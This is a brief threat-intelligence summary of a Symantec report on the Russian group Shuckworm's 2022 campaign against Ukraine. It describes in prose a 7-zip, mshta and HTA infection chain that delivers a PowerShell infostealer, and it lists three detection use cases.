Ukraine Remains Shuckworm's Focus
Industry: N/A | Level: Tactical | Source: Symantec
Russian threat group, Shuckworm (aka Gamaredon, Armageddon) continues to maintained focus against Ukraine, based on Symantec’s latest report. A recent campaign was observed taking place between July 15th, 2022, and August 8th, 2022, to distribute a PowerShell information stealing malware. The documented infection chain involves a downloaded 7-zip archive file calling mshta.exe to download an HTA file masquerading as an XML file. After the XML download, the PowerShell infostealer would execute which capabilities to capture and upload screenshots and run commands from the attacker. The PowerShell stealer malware joins Shuckworm's toolset such as the group's infamous Pterodo backdoor as well as common RDP tools such as AnyDesk and Ammyy Admin.
Anvilogic Use Cases:
- Compressed File Execution
- MSHTA.exe execution
- Executable File Written to Disk